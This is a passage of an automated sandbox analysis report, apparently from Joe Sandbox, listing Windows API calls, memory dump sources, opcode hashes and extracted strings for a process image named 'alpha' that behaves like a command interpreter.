                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968AB6F
                                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968ABA4
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7196898C0), ref: 00007FF71968ABCB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteValue$CreateOpen
                                                                    • String ID: %s=%s
                                                                    • API String ID: 1019019434-1087296587
                                                                    • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                    • Instruction ID: 097210e0d0b9e8cedfb42c5eb295f8de026e479d28f77e84c3108c62ddff4fd0
                                                                    • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                    • Instruction Fuzzy Hash: B5518531B08F52C6E760AF29A445B6EF6B6FB897A4F844135CE4D43794DF38D44A8720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memset$FullNamePathwcsrchr
                                                                    • String ID:
                                                                    • API String ID: 4289998964-0
                                                                    • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                    • Instruction ID: a5879b723670741e044cba71743059a713a200a8d3ba510f7afc5468c75dadae
                                                                    • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                    • Instruction Fuzzy Hash: DFC18551A09B56C2EA54BF51D649779E3B2FB85BE8F805531CA0E077D0DE3CA49B8330
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                    • String ID: %9d
                                                                    • API String ID: 1006866328-2241623522
                                                                    • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                    • Instruction ID: b0af004e6956a07f6d7399c30b5f05398a06e9c8a18a147384e8c8fd09920c79
                                                                    • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                    • Instruction Fuzzy Hash: 68515F72A08A428AE700EF51E8405ACB7B6FB4477CF814635DA6D53795DF3CE50A8B30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: GeToken: (%x) '%s'
                                                                    • API String ID: 2081463915-1994581435
                                                                    • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                    • Instruction ID: 64d04982928c5362855e967ceb6470d709df33407e4c4c1985765d8bcb64e6bc
                                                                    • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                    • Instruction Fuzzy Hash: 55718F20E0CE4685FB65BF65A854279A6B2AF10B7CFC44535D60E42691EF3CB49BC370
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$iswspacewcschr
                                                                    • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                    • API String ID: 840959033-3627297882
                                                                    • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                    • Instruction ID: f63ea3552a1364de2c54e1baf8544b533cc30d33766b73eb9122bba68413fcc7
                                                                    • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                    • Instruction Fuzzy Hash: 6CD14C25E0CE43C6EA14BF21A8152B9A6B3BF54B6CFC45035D60E46295EF2CE94F8731
                                                                    APIs
                                                                      • Part of subcall function 00007FF719673578: _get_osfhandle.MSVCRT ref: 00007FF719673584
                                                                      • Part of subcall function 00007FF719673578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF71967359C
                                                                      • Part of subcall function 00007FF719673578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735C3
                                                                      • Part of subcall function 00007FF719673578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735D9
                                                                      • Part of subcall function 00007FF719673578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7196735ED
                                                                      • Part of subcall function 00007FF719673578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7196632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF719673602
                                                                    • _get_osfhandle.MSVCRT ref: 00007FF7196632F3
                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7196632A4), ref: 00007FF719663309
                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF719663384
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7196811DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                    • String ID:
                                                                    • API String ID: 611521582-0
                                                                    • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                    • Instruction ID: 2cace691539c7cc0a2a07b20052573a2cb9aa82beac558a841e84aec7e07f9d3
                                                                    • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                    • Instruction Fuzzy Hash: 5DA18032B08E52CAEB14AF61A8446BDE6B2FB49B6DF855135CD0E47784DF3C944A8630
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile_open_osfhandle
                                                                    • String ID: con
                                                                    • API String ID: 2905481843-4257191772
                                                                    • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                    • Instruction ID: 09f24eb381075a1aa031bba84f8286e1e113d96e4a7e240c8013669a3141a2b1
                                                                    • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                    • Instruction Fuzzy Hash: 9E71B732608A819AE724AF14E440679F6B2FB89B79F945234DA5E427D4DF3CD44ECB30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                    • String ID: CSVFS$NTFS$REFS
                                                                    • API String ID: 3510147486-2605508654
                                                                    • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                    • Instruction ID: 54f13eb94f7a63c049f7abc5d7fb69ca10bf74aca3624eac17364f0704495db2
                                                                    • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                    • Instruction Fuzzy Hash: 9A614932608FC2CAEB659F21D8443E9A7A5FB45B98F855079DA0D4B758DF3CD209C720
                                                                    APIs
                                                                    • longjmp.MSVCRT(?,00000000,00000000,00007FF719667279,?,?,?,?,?,00007FF71966BFA9), ref: 00007FF719684485
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: longjmp
                                                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                    • API String ID: 1832741078-366822981
                                                                    • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                    • Instruction ID: 0b87ecf68bd7fc3345ff7f3a145dcf4eac89c3c3b5319a2e00fa2a497e222504
                                                                    • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                    • Instruction Fuzzy Hash: B0C16960E0CF42C5E624AE1651416B8E7B3AB46FACFD0003ADD0D53691CF2DA94F9371
                                                                    APIs
                                                                    • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF719676677
                                                                    • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF71967668F
                                                                    • _errno.MSVCRT ref: 00007FF7196766A3
                                                                    • wcstol.MSVCRT ref: 00007FF7196766C4
                                                                    • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF7196766E4
                                                                    • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF719676570,?,?,?,?,?,?,00000000,00007FF719676488), ref: 00007FF7196766FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                    • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                    • API String ID: 2348642995-441775793
                                                                    • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                    • Instruction ID: 3c341f2c9a880dd67fa4402b775affe1361370edfefb5b28f2e9fe74afe5512f
                                                                    • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                    • Instruction Fuzzy Hash: 87717F62908E46D5E7686F15D410179F7B2EB85BA8FD4D031DA4E06294EF3CE88AC732
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                    • API String ID: 3223794493-3086019870
                                                                    • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                    • Instruction ID: f7ad0245ab337b50f9635bed27ecfbbbbf0c6fd9fcd9007821e411b2800c6a02
                                                                    • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                    • Instruction Fuzzy Hash: 0D518165A08F4289EA14AF25A41017DBBB2FF49B78F945175CA1E073A0EF3CE44AC731
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                    • String ID: %s$/-.$:
                                                                    • API String ID: 1644023181-879152773
                                                                    • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                    • Instruction ID: aa15f1a876166277345de3e14c8ff5c378a118f65a19ca32ff5c26dec795e710
                                                                    • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                    • Instruction Fuzzy Hash: 37919362A08F42D5EB10AF14E4411BDE2B2FF44BA8FC44436D65E426D5DE2CE54B8331
                                                                    APIs
                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF719687251), ref: 00007FF71968628E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait
                                                                    • String ID: wil
                                                                    • API String ID: 24740636-1589926490
                                                                    • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                    • Instruction ID: 4d9f0d8f905286a1ce03777bcfecb3ecce77dac76c1a5a1d03c6ae8e0daf9a4d
                                                                    • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                    • Instruction Fuzzy Hash: 27413D21A08F42C7E3206F15A401379E6B2EF857A9FA0A171D91A46A94DF3DDC4E8731
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000006.00000002.1324376586.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324459945.00007FF7196B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1324546917.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                    • String ID:
                                                                    • API String ID: 1397130798-0
                                                                    • Opcode ID: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                                    • Instruction ID: 50a8c0007ef13cd8beff3710dfab2b5dc73a6eabbaa483f78566b7ef5de51146
                                                                    • Opcode Fuzzy Hash: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                                    • Instruction Fuzzy Hash: 8C919622A08F8186EB68AF5194506BDF3B2FB44BA8FC48135DA4D07794EF3CD54A9730
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706D6
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706F0
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF71967074D
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF719670762
                                                                    • _wcsicmp.MSVCRT ref: 00007FF7196725CA
                                                                    • _wcsicmp.MSVCRT ref: 00007FF7196725E8
                                                                    • _wcsicmp.MSVCRT ref: 00007FF71967260F
                                                                    • _wcsicmp.MSVCRT ref: 00007FF719672636
                                                                    • _wcsicmp.MSVCRT ref: 00007FF719672650
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1324398177.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
